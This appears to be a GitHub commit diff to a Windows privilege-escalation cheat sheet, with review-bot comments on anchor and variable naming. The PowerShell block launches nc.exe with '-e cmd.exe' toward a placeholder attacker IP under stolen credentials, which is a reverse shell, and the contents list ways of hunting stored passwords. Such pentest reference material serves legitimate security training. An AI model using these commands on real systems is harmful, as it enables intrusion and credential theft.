Update Windows - Privilege Escalation.md

Make powershell on EoP - Runas easier to copy paste
Fanis Katsimpas 2020-03-22 19:25:35 +00:00 committed by GitHub
parent 4303caa08c
commit 2bdbb2dbc5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -12,7 +12,7 @@
* [Search for file contents](#search-for-file-contents)
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
* [Passwords in unattend.xml](#passwords-in-unattend.xml)
* [Passwords in unattend.xml](#passwords-in-unattendxml)
* [Wifi passwords](#wifi-passwords)
* [Passwords stored in services](#passwords-stored-in-services)
* [Powershell history](#powershell-history)
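Review bot: The table-of-contents anchor for "Passwords in unattend.xml" changes here from `#passwords-in-unattend.xml` to `#passwords-in-unattendxml`, but the commit message only mentions the EoP - Runas PowerShell snippet. Please mention the link fix in the message or split it into its own commit, and confirm the new anchor matches the slug generated for that heading so the link resolves.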
@ -712,9 +712,9 @@ C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\us
```
```powershell
$ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$ computer = "<hostname>"
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$computer = "<hostname>"
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
```
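Review bot: `$computer = "<hostname>"` is still undocumented in the assignment lines, and the name is misleading: it is passed as the fifth argument to `[System.Diagnostics.Process]::Start(...)`, which in the `Start(fileName, arguments, userName, password, domain)` overload is the account's domain. Consider renaming it to `$domain` or adding a one-line comment saying what value belongs there. Also, the `runas.exe` line just above this block still uses bare `<username> <password>` placeholders with no note on how they are meant to be substituted, so a short explanatory sentence before both snippets would help readers.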